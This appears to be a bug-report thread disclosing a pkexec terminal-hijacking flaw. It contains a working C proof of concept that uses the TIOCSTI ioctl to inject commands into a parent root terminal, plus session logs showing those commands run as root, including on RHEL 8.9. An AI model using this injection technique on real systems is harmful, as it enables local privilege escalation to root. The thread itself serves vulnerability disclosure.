When executing a program via "pkexec --user nonpriv program" the nonpriv session can escape to the parent session by using the TIOCSTI ioctl to push characters into the terminal's input buffer, allowing privilege escalation. This issue has been fixed in "su" (CVE-2005-4890) by calling setsid() and in "sudo" by using the "use_pty" flag.

$ cat test.c
#include <sys/ioctl.h>

int main(void)
{
    /* push "id\n" into the terminal's input queue, one byte per ioctl */
    char *cmd = "id\n";
    while (*cmd)
        ioctl(0, TIOCSTI, cmd++);
    return 0;
}
$ gcc test.c -o test
$ id
uid=1000(saken) gid=1000(saken) groups=1000(saken)
# pkexec --user saken ./test      <---- last command I typed in: id
# id                              <---- did not type this
uid=0(root) gid=0(root) groups=0(root)
You have to possess CAP_SYS_ADMIN to successfully invoke the TIOCSTI ioctl. That implies to me that pkexec is allowing test to execute with that (and possibly other) capabilities. If that's the case, you're merely running as root by another name.
Or you can pass that tty ownership check that's been in there seemingly forever... sorry for the noise.
Has this actually been fixed? On a RHEL 8.9 system I've built the sample exploit from https://ruderich.org/simon/notes/su-sudo-from-root-tty-hijacking and it works:

root@myhost:/var/tmp/tiocsti130# pkexec -u nobody /bin/bash
bash-4.4$ /var/tmp/tiocsti/tiocsti   # <-- this is me running the exploit, subsequent output is caused by the exploit hijacking my terminal
exit
echo Payload as `whoami`
bash-4.4$ exit
exit
root@myhost:/var/tmp/tiocsti# echo Payload as `whoami`
Payload as root